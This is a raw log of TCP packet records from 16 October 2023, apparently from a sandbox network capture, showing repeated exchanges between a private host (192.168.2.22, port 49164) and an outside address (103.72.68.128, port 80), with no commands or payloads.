Oct 16, 2023 09:58:27.733966112 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.734029055 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.734072924 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.734086990 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.734126091 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.734146118 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.734185934 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.734231949 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.734275103 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.734337091 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.734371901 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.734416008 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.734457016 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.734488964 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.734535933 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.734622955 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.734622955 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.734648943 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.734688044 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.734690905 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.734724045 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.734786034 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.734812021 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.734833002 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.734852076 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.734878063 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.734921932 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.734989882 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.735028028 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.735109091 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.735124111 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.735146999 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.735163927 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.735178947 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.735212088 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.735234022 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.735270023 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.735304117 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.735341072 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.735342026 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.735378981 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.735424995 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.735465050 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.735497952 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.735542059 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.735544920 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.735582113 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.735615015 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.735655069 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.735671043 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.735708952 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.735742092 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.735783100 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.735786915 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.735826969 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.735858917 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.735894918 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.735989094 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.736028910 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.736069918 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.736094952 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.736107111 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.736123085 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.736157894 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.736196995 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.736248970 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.736284971 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.736327887 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.736381054 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.736414909 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.736450911 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.736485958 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.736524105 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.736522913 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.736572027 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.736588955 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.736627102 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.736643076 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.736680984 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.736715078 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.736754894 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.736778021 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.736829996 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.736840963 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.736871958 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.736903906 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.736944914 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.737014055 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.737051964 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.737082005 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.737118959 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.737153053 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.737189054 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.737237930 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.737252951 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.737273932 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.737292051 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.737340927 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.737380981 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.737399101 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.737435102 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.737504959 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.737541914 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.737597942 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.737634897 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.737688065 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.737731934 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.737833023 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.737873077 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.737881899 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.737916946 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.737972975 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.737987041 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.738008022 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.738025904 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.738076925 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.738117933 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.738166094 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.738203049 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.738267899 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.738312960 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.738322020 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.738358974 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.738389015 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.738445997 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.738451004 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.738487959 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.738506079 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.738549948 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.738598108 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.738637924 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.738687992 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.738723993 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.738759041 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.738802910 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.738825083 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.738841057 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.738887072 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.738917112 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.738948107 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.739001036 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.739022970 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.739080906 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.739105940 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.739116907 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.739146948 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.739186049 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.739200115 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.739232063 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.739262104 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.739298105 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.739367008 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.739406109 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.739435911 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.739475012 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.739551067 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.739584923 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.739593983 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.739622116 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.739654064 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.739691019 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.739698887 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.739736080 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.739768028 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.739804983 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.739895105 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.739931107 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.739959955 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.739999056 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.740071058 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.740086079 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.740112066 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.740128040 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.740142107 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.740186930 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.740219116 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.740257025 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.740289927 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.740330935 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.740339994 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.740421057 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.740434885 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.740442038 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.740458965 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.740475893 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.740505934 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.740545988 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.740578890 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.740611076 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.740622997 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.740663052 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.740684032 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.740731955 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.740748882 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.740787029 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.740809917 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.740848064 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.740955114 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.740994930 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.741025925 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.741060019 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.741117954 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.741149902 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.741156101 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.741183996 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.741231918 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.741260052 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.741265059 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.741295099 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.741333961 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.741365910 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.741396904 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.741413116 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.741432905 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.741449118 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.741477966 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.741513014 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.741574049 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.741610050 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.741611958 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.741645098 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.741712093 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.741746902 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.741791964 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.741827965 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.741846085 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.741878986 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.741944075 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.741981983 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.742001057 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.742034912 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.742079973 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.742115021 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.742115021 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.742168903 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.745439053 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.746846914 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.746884108 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.746901989 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.746973038 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.747030020 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.747088909 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.747122049 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.747152090 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.747203112 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.747255087 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.747278929 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.747294903 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.747325897 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.747365952 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.747381926 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.747419119 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.747432947 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.747467995 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.747545004 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.747579098 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.747597933 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.747634888 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.747663975 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.747699022 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.747703075 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.747740030 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.747787952 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.747817039 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.747864962 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.747951984 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.747951984 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.747987032 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.748007059 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.748040915 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.748090982 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.748125076 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.748145103 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.748179913 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.748212099 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.748224974 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.748245001 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.748260021 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.748313904 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:27.748377085 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:27.757472038 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.074119091 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.074136019 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.074217081 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.074229956 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.074328899 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.074388981 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.074388981 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.074548960 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.074585915 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.074650049 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.074687958 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.074743032 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.074781895 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.074832916 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.074876070 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.074906111 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.074948072 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.075090885 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.075128078 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.075145960 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.075181007 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.075241089 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.075278044 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.075335026 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.075375080 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.075517893 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.075553894 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.075731039 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.075767994 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.075819016 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.075854063 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.075886965 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.075923920 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.075938940 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.075973988 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.075992107 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.076029062 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.076041937 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.076076984 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.076100111 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.076136112 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.076154947 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.076189995 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.076234102 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.076268911 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.076385975 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.076423883 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.076482058 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.076515913 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.076576948 CEST	80	49164	103.72.68.128	192.168.2.22
Oct 16, 2023 09:58:28.076617002 CEST	49164	80	192.168.2.22	103.72.68.128
Oct 16, 2023 09:58:28.076798916 CEST	80	49164	103.72.68.128	192.168.2.22
